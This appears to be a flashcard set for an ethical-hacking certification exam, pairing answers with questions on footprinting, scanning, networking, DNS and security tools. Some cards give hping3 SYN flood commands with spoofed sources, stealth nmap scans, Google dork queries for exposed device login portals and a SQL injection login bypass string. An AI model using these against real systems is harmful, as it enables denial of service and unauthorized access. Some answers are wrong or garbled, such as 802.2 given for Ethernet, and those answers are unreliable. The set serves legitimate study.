What threat type is someone with limited authorized access?
operating system level application level network level
What three levels can attackers gain access to?
Tails
What tool aims at preserving privacy and anonymity and helps you to: Use the Internet anonymously and circumvent censorship Leave no trace on the computer Use state-of-the-art cryptographic tools to encrypt files, emails and instant messaging
CurrPorts
What tool displays a list of all currently opened TCP/IP and UDP ports on your local computer, including information about the process that opened the port, the process name, full path, version information, the time it created, and the user who created it.
StegoStick
What tool hides any file or message into an image (BMP, JPG, GIF), Audo/Video (MPG, WAV, etc) or any other file format (PDF, EXE, CHM, etc)
McAfee's Visual Trace NeoTrace Trout VisualRoute Magic NetTrace Network Pinger GEO Spider Ping Plotter
What tools can you use to build a comprehensive map of a network showing geographic locations and such?
A host-based IDS
What type of IDS can recognize an attack made with the use of fragroute?
Nbtstat
Which command can be used to view NetBIOS information?
netsh firewall set opmode enable
Which command enables the Windows firewall?
A)Security awareness training
Which of the following is NOT a component of risk assessment? A)Security awareness training B)Physical safeguards C)Administrative safeguards D)Logical safeguards
C)Host-based IDS on the exposed system
Which of the following is a possible mitigation to the use of fragroute by an attacker? A)SPAN B)RSPAN C)Host-based IDS on the exposed system D)Expression matching
END
Which of the following is not a flag on a packet?
D. Teardrop
Which of the following takes advantage of weaknesses in fragment reassembly in TCP/IP? A. Stuxnet B. Smurf C. SYN Flood D. Teardrop
NULL
Which of the following types of attack has no flags set?
22
Which port number is used for SSH?
Malware covers all malicious software
Which statement(s) define malware most accurately?
D) Scanning
Which step comes right after footprinting? A) Privilege escalation B) Gaining access C) System attacks D) Scanning
(XMAS) No response RST/ACK
XMAS scans, if the port is open _____, if the port is closed ____ responses.
Microsoft Windows
Xmas scan will not work against any current version of ___
D) Ping Sweep
You are attempting to identify live targets on a particular subnet. You kick off a scan whereby ICMP packets are sent to every IP address within the subnet and await responses. What is this activity called? A) Enumeration B) Ping Crawl C) Port Scan D) Ping Sweep
telephone calls to the help desk or technical department
example of Active Reconnaissance
searching public records or news releases
example of Passive Reconnaissance
performs an ICMP ping
hping3 -1 172.17.15.12
performs a UDP scan on port 80
hping3 -2 192.168.12.55 -p 80
scans ports 20 through 100
hping3 -8 20-100
looks for HTTP signature packets on eth0
hping3 -9 HTTP -I eth0
SYN flood from 192.168.10.10 against 192.168.10.22
hping3 -S 192.168.10.10 -a 192.168.10.22 -p 22 --flood
Pages containing D-Link login portals
intitle:"D-Link VoIP Router" "Welcome"
Pages containing login portals
intitle:"Login Page" intext:"Phone Adapter Configuration Utility"
Search Linksys phones
intitle:"SPA Configuration"
Finds the Asterisk web management portal
intitle:asterisk.management.portal web-access
Look for the Asterisk management portal
intitle:asterisk.management.portal web-accesss
Find the Cisco phone details
inurl:"NetworkConfiguration" cisco
Find Cisco call manager
inurl:"ccmuser/login.asp"
Competitive intelligence
is non-interfering and subtle in nature
PsKill
kill processes by name or process ID
Internet Assigned Numbers Authority (IANA)
maintains something called the Service Name and Transport Protocol Port Number Registry, which is the official list for all port number reservations.
SYN port scan on a target as quietly as possible
nmap 192.168.1.0/24 -sS -T0
An aggressive XMAS scan
nmap 192.168.1.0/24 -sX -T4
Scan multiple IPs
nmap 192.168.1.100 192.168.1.101
nmap <scan options> <target>
nmap syntax
Dynamic ports
port numbers 49,152 - 65,535
is nothing more than a system you set up to act as an intermediary between you and your targets.
proxy
PsShutdown
shuts down and optionally reboots a computer
active footprinting
social engineering, human interaction, and anything that requires the hacker to interact with the organization is considered what type of footprinting?
IP address decoy
technique refers to generating or manually specifying IP addresses of the decoys in order to evade IDS/firewall
E-mail Policy or E-mail Security Policy
this addresses the proper use of the company e-mail system.
Full Connect (also called TCP connect or full open scan)
this runs through a full connection (three-way handshake) on all ports, tearing it down with an RST at the end.
ICMP ECHO packets (UDP datagrams in Linux versions)
traceroute or tracert uses what to report information on each "hop" (router) from the source to the destination?
Cracker malicious hacker
uses those skills, tools, and techniques either for personal gain or destructive purposes or, in purely technical terms, to achieve a goal outside the interest of the system owner.
confidentiality integrity availability
what is the trinity of IT security? (3 parts)
CCleaner
what tool cleans traces of temporary files, log files, registry files, memory dumps, and also your online activities such as your Internet history
Anonymous footprinting
where you try to obscure the source of all this information gathering
Normal output
-oN
B) Xterm
Of the commands listed, which are most likely to NOT be Trojaned by an attacker? A) Netstat B) Xterm C) Ps D) Top
B) MBSA
Of the following, which is best for checking patch levels on a Windows machine? A) Nslookup B) MBSA C) Matasploit D) Sigverif
C)Hot and cold aisles
Of the listed physical security controls, which is usually only deployed in the data center? A)Fire suppression B)CCTV cameras C)Hot and cold aisles D)Security guards
NetScan Tools Pro SuperScan Network Inventory Explorer PRTG Network Monitor Global Network Inventory Net Tools SoftPerfect Network Scanner IP-Tools Advanced Port Scanner MegaPing CurrPorts
Scanning Tools
NetScanTools Pro SuperScan PRTG Network Monitor OmniPeek MiTeC Network Scanner NEWT Professional MegaPing
Scanning Tools
Umit Network Scanner Fing IP Network Scanner PortDroid Network Analysis Pamn IP Scanner Network Discovery
Scanning Tools for Mobile
Bit
What PDU is at Layer 1 of OSI model
Training
What is the best option for thwarting social engineering attacks?
True positive
What is the term for a system correctly allowing traffic or actions that should be allowed?
True negative
What is the term for a system correctly preventing traffic or actions that should be not allowed?
False negative
What is the term for a system failing to prevent traffic or actions that should be not allowed?
Denial of service
What type of cybersecurity attack is mitigated by redundancy?
Cookie hijacking
Which attack can be used to take over a previous session?
B)CA
Which component in the PKI issues the certificate? A)CPS B)CA C)RA D)VA
C)OSSTMM
Which of the following testing methodologies addresses security controls? A)SOAP B)CORBA C)OSSTMM D)OWASP
B)Distributed denial of service E)Password cracking
You are running a penetration test for a small IT service provider during normal operating hours. Which of the following activities is most likely to be restricted in the rules of engagement (ROE)? (Choose all that apply.) A)Social engineering B)Distributed denial of service C)Network sniffing D)Port scanning E)Password cracking
C. CNAME
You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)? A. NS B. SOA C. CNAME D. PTR
A)It is very easy to detect on the computer or device being scanned.
You have decided to use Nmap to scan your network to aid in determining any network security issues that exist. The first type of scan that you decide to run is the TCP connect scan. Which statement is true regarding this type of scan? A)It is very easy to detect on the computer or device being scanned. B)It sends a packet with only the FIN flag set in the TCP header. C)It sends a packet with no flags switched on in the TCP header. D)It can detect three port states: open, closed, and filtered.
A)Deploy a switch, and implement a VLAN for the Research department devices and computers.
You need to isolate the communication for desktop computers in the Research department within the company's network. The solution must improve overall performance and security. Which solution should you suggest? A)Deploy a switch, and implement a VLAN for the Research department devices and computers. B)Deploy Bluetooth, and implement a PAN for the Research department devices and computers. C)Deploy 802.11b, and implement a WLAN for the Research department devices and computers. D)Deploy 802.11g, and implement a WLAN for the Research department devices and computers.
Subnet Mask Calculators
Attackers calculate subnet masks using ____ to identify the number of hosts present in the subnet
Backdoors RootKits Trojans
Attackers may prevent the system from being owned by other attackers by securing their exclusive access with ____, ____, or ____.
UPnP SSDP M-SEARCH
Attackers may use ___ information discovery tool to check if the machine is vulnerable to uPnP exploits or not
network traffic recorded logs received from
Attackers need to harvest IPv6 addresses from ____ : and other header lines in archived email or Usenet news messages
identify vulnerabilities
Footprinting allows attacker to ___ in the target systems in order to select appropriate exploits
same
For a block cipher algorithm, the length of the input block is the ___ as the length of the output block.
Session
Layer 5 of OSI model
FF:FF:FF:FF:FF:FF
MAC address of broadcast messages
fingerprinting
Port sweeping and enumeration on a machine is also known as ____.
Regional Internet Registry (RIR)
You can find the range of IP addresses and the subnet mask used by the target organization from ______
Nmap SolarWinds Netcraft HTTrack
You can fingerprint operating systems with several tools:
Network Topology Mapper
discovers a network and produces a comprehensive network diagram
Metagoofil
extracts metadata of public documents (pdf, doc, xls, ppt, docx, pptx, xlsx, etc.) belonging to a target company
Control Objects for Information and Related Technology (COBIT)
is "an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. It enables clear policy development, good practice, and emphasizes regulatory compliance."
Maltego (www.paterva.com/web5/)
is "an open source intelligence and forensics application" designed explicitly to demonstrate social engineering (and other) weaknesses for your environment.
Exploit Database
is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable softwate
resource identifier (RID)
is a portion of the overall SID identifying a specific user, computer, or domain.
Online Reputation Management (ORM)
is a process of monitoring a company's reputation on Internet and taking certain measures to minimize the negative search results/reviews and thereby improve its brand reputation.
Maltego
is a program that can be used to determine the relationships and real world links between people, groups of people (social networks), companies, organizations, websites, Internet infrastructure, phrases, documents, and files
Proxy Workbench
is a proxy server that displays data passing through it in real time, allows you to drill into particular TCP/IP connections, view their history, save the data to a file, and view the socket connection diagram
Payment Card Industry Data Security Standard (PCI-DSS)
is a security standard for organizations handling credit cards, ATM cards, and other point-of-sales cards.
Bot
is a software application that can be controlled remotely to execute or automate predefined tasks
Payload
is the part of an exploit code that performs the intended malicious action, such as destroying, creating backdoors, and hijacking computer
Document steganography
is the technique of hiding secret messages transferred in the form of documents It includes addition of white spaces and tabs at the end of the lines
Nessus
is the vulnerability and configuration assessment product
Eavesdropping
is unauthorized listening of conversations or reading of messages
Ping Sweep
is used to determine the live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts. If a host is live, it will return an ICMP ECHO reply
ID Serve
is used to identify the make, model, and version of any web site's server software, it also used to identify non-HTTP (non-web) Internet servers such as FTP, SMTP, POP, NEWS, etc.
Network scanning
refers to a set of procedures for identifying hosts, ports, and services in a network
Source routing
refers to sending a packet to the intended destination with partially or completely specified route (without firewall / IDS-configured routers) in order to evade IDS/firewall
Competitive intelligence
refers to the information gathered by a business entity about its competitors' customers, products, and marketing
802.11a
runs at up to 54 Mbps at 5 GHz
PsFile
shows files opened remotely
Bastion host
A computer placed outside a firewall to provide public services to other Internet sites and hardened to resist external attacks.
C. The results will display all HTTP traffic from 192.168.1.1
Examine the Wireshark filter shown here: ip.src == 192.168.1.1 &&tcp.srcport == 80 Which of the following correctly describes the capture filter? A. The results will display all traffic from 192.168.1.1 destined for port 80. B. The results will display all HTTP traffic to 192.168.1.1 C. The results will display all HTTP traffic from 192.168.1.1. D. No results will display because of invalid syntax.
Software in use and its behavior Scripting platform used
Examining cookies may provide what kind of information?
"initrd"
Horse Pill is Linux kernel rootkit that resides inside the ___ using which it infects the system and deceives the system owner with the use of container primitives
Application
Layer 7 of OSI model
TCP payload
Reverse ICMP Tunnels the Victim's system is triggered to encapsulate ___ in an ICMP echo packet which is forwarded to the proxy server
C) IDS, packer logger, and sniffer
Snort can perform as a ____? A) IDS, sniffer, and proxy B) IDS, firewall, and sniffer C) IDS, packer logger, and sniffer D) IDS, sniffer, and forensic packet analyzer
Network
The TCP/IP model Internet layer is what in the OSI model layer?
B)No known workaround exists
The security team has been analyzing several vulnerabilities found in the Linux kernel they are using. Any upgrades that can be delayed must be pushed to the next fiscal year. Which of the following describes a vulnerability that would require an immediate kernel upgrade? A)A threat vector can be disabled B)No known workaround exists C)Exists in an unused function D)Known workarounds exist
NS (Name Server)
This record defines the name servers within your namespace. These servers are the ones that respond to your clients' requests for name resolution.
SOA (Start of Authority)
This record identifies the primary name server for the zone. The SOA record contains the hostname of the server responsible for all DNS records within the namespace, as well as the basic properties of the domain.
A (Address)
This record maps an IP address to a hostname and is used most often for DNS lookups.
CNAME (Canonical Name)
This record provides for domain name aliases within your zone.
www.geektools.com www.dnsstuff.com www.samspade.com
Well-known websites for DNS or whois footprinting:
Internet Zone Internet DMZ Production Network Zone Intranet Zone Management Network Zone
What are five examples of Network Security Zones?
eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker Yesware Zendio ContactMonkey Pointofmail Read Notify WhoReadMe DidTheyReadit GetNotify Trace Email G-Lock Analytics
What are some Email Tracking Tools?
[cache:] [link:] [related:] [info:] [site:] [allintitle:] [intitle:] [allinurl:] [inurl:]
What are some Google advance search operators?
Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map
What are the four main goals of footprinting?
Promiscuous Policy Permissive Policy Prudent Policy Paranoid Policy
What are the four types of Security Policies?
1) Helps in monitoring and detecting network behaviors 2) Detect and recover from security breeches 3) Pays attention to various threats 4) Benefits organization in cost prosoective 5) Identify assets 6) Helps to perform risk assessment
What are the six goals of EISA?
Something you know Something you have Something you are
What are the three factors of authentication?
C) An attacker who does not care about the consequences of his actions to himself
What is the best description of a suicide hacker? A) An attacker who perform only DoS attacks B) An attacker who posts all his findings for public review C) An attacker who does not care about the consequences of his actions to himself D) An attacker who does not care about the consequences of his actions to others
C) To sniff or analyze traffic
What is the purpose in configuring a span port on a switch? A) To allow multiple devices to connect to one port B) To protect against MAC spoofing C) To sniff or analyze traffic D) To restrict the port to one device connection only
It evaluates the execution of the security plan. It is also called a lessons learned session.
What is the purpose of a post-mortem in a security audit?
To document what was done and to provide a record for review if problems arise
What is the purpose of recording the steps taken when implementing a new system?
Password recovery tool for Windows
What is the purpose of the Cain and Abel tool?
To crack weak passwords
What is the purpose of the John the Ripper tool?
Vulnerability scanning
What is the purpose of the Nessus tool?
Intrusion detection
What is the purpose of the Snort tool?
To check the integrity of system files
What is the purpose of the Tripwire tool?
D)Demonstrates common server-side security flaws
What is the purpose of the WebGoat application? A)Responds to SYN flood attacks B)Probes your network for security issues C)Acts as a honeypot for in the network DMZ D)Demonstrates common server-side security flaws
Port scanning
What is the purpose of the nmap tool?
This Web site is an Internet archiving site that maintains archives of Web sites over many years
What is the purpose of the web site archive.org?
define the scope of the assessment
What is the second step in Pen Testing?
Threat vector
What is the term for the tool or process used to exploit a threat?
Spoofcard (www.spoofcard.com)
What tool can be used to spoof a phone number?
frame
When a recipient system gets a ___, it checks the physical address to see who the message is intended for.
D. Hactivism
When an attack by a hacker is politically motivated, the hacker is said to be participating in which of the following? A. Black-hat hacking B. Gray-box attacks C. Gray-hat attacks D. Hactivism
2013090800 = serial number 86400 = refresh interval 900 = retry time 1209600 = expiry time 3600 = defines the TTL for the zone
When looking at a zone transfer you see this line below: hostmaster.anycomp.com (2013090800 86400 900 1209600 3600) What do the numbers mean?
D)ROE
Which documentation provides an ethical hacker with the scope of targets and allowed testing techniques and tools? A)NDA B)PCI C)LPT D)ROE
RSA
Which encryption algorithm is susceptible to a factorization attack?
Port security
Which feature can be enabled on a switch to prevent MAC flooding and MAC spoofing?
snort.config
Which file contains the options for the configuration of the Snort tool?
A. RST
Which flag forces a termination of communications in both directions? A. RST B. FIN C. ACK D. PSH
A. whois
Which footprinting tool or technique can be used to find the names and addresses of employees or technical points of contact? A. whois B. nslookup C. dig D. traceroute
A)MAC flooding D)MAC spoofing
Which of the following attacks can be mitigated by using port security on a switch? (Choose all that apply.) A)MAC flooding B)IP spoofing C)DNS poisoning D)MAC spoofing
C) %windir%\system32\drivers\ect\services
Which of the following contains a listing of port numbers for well-known services defines by IANA? A) %windir%\ext\lists B) %windir%\system32\drivers\ect\Imhosts C) %windir%\system32\drivers\ect\services D) %windir%\system32\drivers\ect\hosts
B)Classes
Which of the following is NOT a component of the Metasploit architecture? A)Interfaces B)Classes C)Libraries D)Modules
A)RC4
Which of the following is NOT a type of block cipher? A)RC4 B)DES C)RC5 D)IDEA
A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide.
Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)? A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide. B. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals traveling abroad. C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multinational corporations. D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset.
C)MAC filtering
Which of the following is an access control mechanism that can be implemented on all wireless networks? A)WEP encryption B)WPA/WPA2 encryption C)MAC filtering D)SSID broadcast
PHP
Which of the following is an example of a server-side scripting language?
A. Incident management
Which of the following is best defined as a set of processes used to identify, analyze, prioritize, and resolve security incidents? A. Incident management B. Vulnerability management C. Change management D. Patch management
Netcat
Which of the following is capable of port redirection? Netstat TCPView Netcat Loki
A) SSL works at the Transport layer, and S-HTTP operates at the Application layer.
Which of the following is true regarding SSL and S-HTTP? A) SSL works at the Transport layer, and S-HTTP operates at the Application layer. B) SSL works at the Network layer, and S-HTTP operates at the Application layer. C) SSL works at the Application layer, and S-HTTP operates at the Network layer. D) SSL works at the Application layer, and S-HTTP operates at the Transport layer.
B. It is a passive OS fingerprinting tool.
Which of the following is true regarding the p0f tool? A. It is an active OS fingerprinting tool. B. It is a passive OS fingerprinting tool. C. It is designed to extract metadata for Microsoft files. D. It is designed for remote access.
D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account
Which of the following is true regarding this output? A) Running the command sid2user S A 5 21 861567501 1383384898 839522115 502 will return the name of the true administrator account B) Running the command sid2user S A 5 21 861567500 1383384898 839522115 501 will return the name of the true administrator account C) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 501 will return the name of the true administrator account D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account
ACL
Which of the following is used to set permissions on content in a website?
B) SYN/ACK
Which of the following represents the second step in the TCP three way handshake? A) SYN B) SYN/ACK C) ACK D) ACK/SYN
A)Execute, implant, retract
Which step involves removing additional user accounts created for the attack phase of a penetration test? A)Execute, implant, retract B)Acquire target C)Escalate privileges D)Penetrate perimeter
IPsec
Which technology can provide protection against session hijacking?
Trapdoor
Which term is used to describe the difficulty of factoring a value generated by large key size?
A)Vulnerability scanner
Which tool can help identify out-of-date software versions, missing patches, or system upgrades? A)Vulnerability scanner B)Network sniffer C)Penetration test D)IDS
Vulnerability scanning
Which type of scanning operates proactively to locate issues, utilizes automated processes, and scans and identifies vulnerabilities of all systems present on the network?
TCPView
Which utility will tell you in real time which ports are listening or in another state?
Remote SPAN (RSPAN)
Which version of the SPAN switch configuration sends traffic from multiple ports on multiple switches to a single switch port where the IDS is located?
whois.com
Which web site can be used to determine the owner of a target web site?
B. Operating system
While performing a pen test, you find success in exploiting a machine. Your attack vector took advantage of a common mistake--the Windows 7 installer script used to load the machine left the administrative account with a default password. Which attack did you successfully execute? A. Application level B. Operating system C. Shrink wrap D. Social engineering E. Misconfiguration
C)Hope to be caught
Why is someone called a suicide hacker? A)Hack for a social cause B)Hack and then offer to correct the vulnerability for money C)Hope to be caught D)Hack with permission
To prevent information leakage
Why should you reduce the amount of information provided in error messages?
Promiscuous mode
Wireshark requires a network card to be able to enter which mode to sniff all network traffic?
B)Time-frame analysis
You are responding to an active hacking attack and need to verify whether an insider suspect is involved. Which type of data analysis should you use? A)Data-hiding analysis B)Time-frame analysis C)Application analysis D)File analysis
C)Child pornography
You have been hired to perform a security assessment of the corporate network. Which discovery requires you to contact external authorities immediately? A)Unlicensed software B)Email exchange between a married employees C)Child pornography D)Espionage data acquired from another organization
D)SMB
You have been using a network sniffer to monitor the traffic on your network. You examine the results and notice that some devices are communicating over TCP port 445. Which protocol is most likely causing this traffic? A)SSL B)BGP C)NetBIOS D)SMB
A)Deploy a secure remote access solution for employees to connect to the company's internal network
You have decided to implement IPSec for certain types of traffic. Which of the following is the best description of why you would implement this protocol? A)Deploy a secure remote access solution for employees to connect to the company's internal network B)Ensure that the same IP address is always used by a server C)Authenticate both ends of a connection between a client and server D)Establish an encrypted link between a web server and a browser
B)IP spoofing
You perform a ping and receive the following results: Pinging 192.168.10.1 with 32 bytes of data: Reply from 192.168.10.1: bytes=32 time=5ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 During a routine ping test later in the week, you receive a reply packet from the IP address 192.168.10.1, but the TTL value is now 40. What is the most likely reason for this discrepancy? A)DDoS attack B)IP spoofing C)ICMP filtering D)Routing loop
C. Installing WinPcap
You want to begin sniffing, and you have a Windows 7 laptop. You download and install Wireshark but quickly discover your NIC needs to be in "promiscuous mode." What allows you to put your NIC into promiscuous mode? A. Installing lmpcap B. Installing npcap C. Installing WinPcap D. Installing libPcap E. Manipulating the NIC properties through Control Panel | Network and Internet | Change Adapter Settings
B. Gray box
You've been hired as part of a pen test team. During the brief, you learn the client wants the pen test attack to simulate a normal user who finds ways to elevate privileges and create attacks. Which test type does the client want? A. White box B. Gray box C. Black box D. Hybrid
A. Fragmenting
You've decided to begin scanning against a target organization but want to keep your efforts as quiet as possible. Which IDS evasion technique splits the TCP header among multiple packets? A. Fragmenting B. IP spoofing C. Proxy scanning D. Anonymizer
B)Brute-force attack
Your company implemented both symmetric and asymmetric cryptography on its network. As a security professional, you must protect against all types of cryptography attacks. Which attack affects both types of cryptography that are implemented? A)Man-in-the-middle attack B)Brute-force attack C)Session hijacking D)Dictionary attack
routed protocol routing protocol
____ is one that is actually being packaged up and moved around. (IPv4 and IPv6). A _____ is the one that decides the best way to get to the destination (for example, BGP, OSPF, or RIP).
Proxy server
is an application that can serve as an intermediary for connecting with other computers
client
A computer process that requests a service from another computer and accepts the server's responses.
Data Link layer (Layer 2)
At which layer of the OSI model does an ARP poisoning attack occur?
RST
During an FIN scan, what indicates that a port is closed?
it pulls every record from the DNS server instead of just the one, or one type, you're looking for.
How does a zone transfer using ls -d differ from a normal DNS request?
It extracts (reverse engineers) data points from a graph
How does the tool DataThief operate?
ICMP Ping
Hping Commands: hping3 -1 10.0.0.25
-S
Hping sets the SYN flag
IP spoofing
In what attack does the attacker assume the IP address of a trusted device in an attempt to access protected resources?
Hping Scapy Komodia Ettercap Cain Nmap
What tools can spoof an IP address:
802.2
Which IEEE standard describes Ethernet?
Suicide hacker
Which kind of hacker hopes to be caught?
E. 631
You are examining traffic to see if there are any network-enabled printers on the subnet. Which of the following ports should you be monitoring for? A. 53 B. 88 C. 445 D. 514 E. 631
B)White box
You organization has contracted with a third party security firm to access your network by performing a penetration test. The test is designed to simulate a malicious insider who has complete knowledge of the target system. What type of test is this? A)Green box B)White box C)Gray box D)Black box
Direct TTL Probes
1) Send packet to host of suspect spoofed packet that triggers reply and compare TTL with suspect packet; if the TTL in the reply is not the same as the packet being checked, it is a spoofed packet 2) This technique is successful when attacker is in a different subnet from victim
covert channel
A communications channel that is being used for a purpose it was not intended for, usually to transfer information secretly.
Network (Layer 3)
At which layer of the OSI model does an IP spoofing attack occur?
Network (Layer 3)
At which layer of the OSI model does an attack using a rogue DHCP server occur?
Black hats
Considered the bad guys, these are the crackers, illegally using their skills for either personal gain or malicious intent. They seek to steal (copy) or destroy data and to deny access to resources and systems. Do not ask for permission or consent.
"fragment identification" number (IPID)
Every IP packet on the Internet has a ____
B. The zone copy is unchanged.
Examine the following SOA record: @ IN SOARTDNSRV1.somebiz.com postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] If a secondary server in the enterprise is unable to check in for a zone update within an hour, what happens to the zone copy on the secondary? A. The zone copy is dumped. B. The zone copy is unchanged. C. The serial number of the zone copy is decremented. D. The serial number of the zone copy is incremented.
gain higher privileges
Exploiting software vulnerabilities allows attacker to execute a command or binary on a target machine to ___ than the existing or bypass security mechanisms
Audit
Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes.
State Sponsored Hackers
Individuals employed by the government to penetrate and gain top-secret information and to damage information systems of other governments
Advanced Persistent Threats
Is an attack that focus on stealing information from the victim machine without the user being aware of it
Pseudonymous footprinting
Make someone else take the blame for your information gathering
Attacks
Motive (Goal) + Method + Vulnerability =
Acceptable use policy (AUP)
Policy stating what users of a system can and cannot do with the organization's assets
UID (User ID) GID (Group ID)
Similar to the SID and RID on a Microsoft Windows machine but on the Linux.
1) The client sends a single SYN packet to the server on the appropriate port 2) If the port is open then the server responds with a SYN/ACK packet 3) If the server responds with an RST packet, then the remote port is in the "closed" state 4) The client sends the RST packet to close the initiation before a connection can ever be established
Stealth Scan Process
Operating system (OS) attacks Application-level attacks Shrink-wrap code attacks Misconfiguration attacks
The 4 Attack Types
decryption
The process of transforming cipher text into plain text through the use of a cryptographic algorithm.
A)Evil twin
To attack a wireless network, an attacker sets up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID. What kind of attack is this? A)Evil twin B)War chalking C)Rogue access point D)WEP attack
Microsoft Outlook www.emailtrackerpro.com www.mailtracking.com
Tools for email footprinting:
Active Passive
What are the two types of banner grabbing?
Risk avoidance
What happens when an organization decides to cease an activity or process that creates a risk?
Scanning
What phase comes after footprinting?
Single-factor authentication
What type of authentication is being performed when both a username and a password are required?
B)RC4
What type of encryption does the Syskey utility utilize? A)RC6 B)RC4 C)RC5 D)RC2
B)Tripwire
Which of the following tools is a System Integrity Verifier? A)Nessus B)Tripwire C)ZoneAlarm D)Snort
Remote Procedure Call (RPC)
allows client and server to communicate in distributed client/server programs
Procedures
are detailed step-by-step instructions for accomplishing a task or goal.
Guidelines
are flexible recommended actions users are to take in the event there is no standard to follow.
Standards
are mandatory rules used to achieve consistency.
Network Tools Pro
assists in troubleshooting, diagnosing, monitoring, and discovering devices on the network
Access control
basically means restricting access to a resource in some selective manner.
Drawing Network Diagrams
gives valuable information about the network and its architecture to an attacker
IP geolocation
helps to identify information such as country, region/state, city, ZIP/postal code, time zone, connection speed, ISP (hosting company), domain name, IDD country code, area code, mobile carrier, elevation, etc.
Finds the Linksys VoIP router configuration page
inurl:/voice/advanced/ intitle:Linksys SPA configuration
Sniffing (also called wiretapping)
is the art of capturing packets as they pass on a wire, or over the airwaves, to review for interesting information.
IPsec
uses ESP (Encapsulation Security Payload), AH (Authentication Header) and IKE (Internet Key Exchange) to secure communication between virtual private network (VPN) end points
Active reconnaissance
uses tools and techniques that may or may not be discovered but put your activities as a hacker at more risk of discovery.
Nondisclosure agreement (NDA)
what type of agreement will ensure the hacker will not disclose any information found during the test.
Passive Banner Grabbing
-Banner grabbing from error messages -Sniffing the network traffic -Banner grabbing from page extensions
C)Three-tier
-Each layer must be able to exist on a physically independent system -Each layer should exchange information only with the layers above and below it -There is a presentation layer, a logic layer, and a data layer Which system architecture has the above characteristics? A)Sandboxing B)Three-legged C)Three-tier D)Defense in depth
SYN ping
-PS
TCP ping
-PT
Serial, normal speed scan
-T2
A. Use HTTP tunneling.
A security administrator is attempting to "lock down" her network and blocks access from internal to external on all external firewall ports except for TCP 80 and TCP 443. (FTP, as well as some nonstandard port numbers). Which of the following is the most likely choice the user could attempt to communicate with the remote systems over the protocol of her choice? A. Use HTTP tunneling. B. Send all traffic over UDP instead of TCP. C. Crack the firewall and open the ports required for communication. D. MAC flood the switch connected to the firewall.
Protection profile (PP)
A set of security requirements specifically for the type of product being tested
crypter
A software tool that uses a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products.
check the filtering system
ACK flag probe scanning can also be used to ___ of target
records all keystrokes typed, IM chats, websites visited
Amac Keylogger for Mac invisibly ___, and takes screenshots and also sends all reports to the attacker by email, or upload everything to attacker's website
D. Archive.org
Amanda works as senior security analyst and overhears a colleague discussing confidential corporate information being posted on an external website. When questioned on it, he claims about a month ago he tried random URLs on the company's website and found confidential information. Amanda visits the same URLs but finds nothing. Where can Amanda go to see past versions and pages of a website? A. Search.com B. Google cache C. Pasthash.com D. Archive.org
Anonymizers
An _____ removes all the identifying information from the user's computer while the user surfs the Internet
B. The web application returned the first record it found
An administrator enters admin' or '1'='1 in the email field of a web page. A message appears stating "Your login information has been mailed to [email protected]" What is most likely occurred? A. The web application picked a record at random B. The web application returned the first record it found C. A server error has caused the application to malfunction D. The web application emailed the administrator about the error
C)14-character passwords will take only slightly longer to crack than the 8-character passwords
Due to the need to support legacy systems, you have been forced to rely on LAN Manager password security. To ensure that users' passwords are strong enough, you plan to use John the Ripper to crack the passwords after obtaining the SAM files from the domain controllers. One of the domains requires 14 characters in the password, while another domain requires only 8. Which of the following statements is true? A)14-character passwords will take much longer to crack than the 8-character passwords B)14-character and 8-character passwords will take exactly the same amount of time to crack C)14-character passwords will take only slightly longer to crack than the 8-character passwords D)8-character passwords will take longer to crack than the 14-character passwords
1) Restrict the interactive logon privileges 2) Use encryption technique to protect sensitive data 3) Run users and applications on the least privileges 4) Reduce the amount of code that runs with particular privilege 5) Implement multi-factor authentication and authorization 6) Perform debugging using bounds checkers and stress tests 7) Run services as unprivileged accounts 8) Test operating system and application coding errors and bugs thoroughly 9) Implement a privilege separation methodology to limit the scope of programming errors and bugs 10) Patch and update the kernel regularly 11) Change User Account Control settings to "Always Notify" 12) Restrict users from writing files to the search paths for applications 13) Continuously monitor file system permissions using auditing tools 14) Reduce the privileges of users and groups so that only legitimate administrators can make service changes 15) Use whitelisting tools to identify and block malicious software 16) Use fully qualified paths in all the Windows applications 17) Ensure that all executables are placed in write-protected directories 18) In Mac operating systems, make plist files read-only 19) Block unwanted system utilities or software that may be used to schedule tasks 20) Patch and update the web servers regularly
How to defend against privilege escalation
SYN scan on port 50-60
Hping Commands: hping3 -8 50-60 -S 10.0.0.25 -V
Intercept all traffic containing HTTP signature
Hping Commands: hping3 -9 HTTP -I eth0
ACK scan on port 80
Hping Commands: hping3 -A 10.0.0.25 -p 80
FIN, PUSH and URG scan on port 80
Hping Commands: hping3 -F -P -U 10.0.0.25 -p 80
SYN flooding a victim
Hping Commands: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood
Firewalls and Times Stamps
Hping Commands: hping3 -s 72.14.207.99 -p 80 -- tcp-timestamp
Collecting Initial Sequence Number
Hping Commands: hping3 192.168.1.103 -Q -p 139 -s
-1
Hping sets ICMP mode
higher level permissions
If the process that is executing this binary is having ___ then the malicious binary also executes under higher level permissions
nbtstat -n
If you want to bring up name table on your machine using NetBIOS.
CareerBuilder.com Monster.com Dice.com
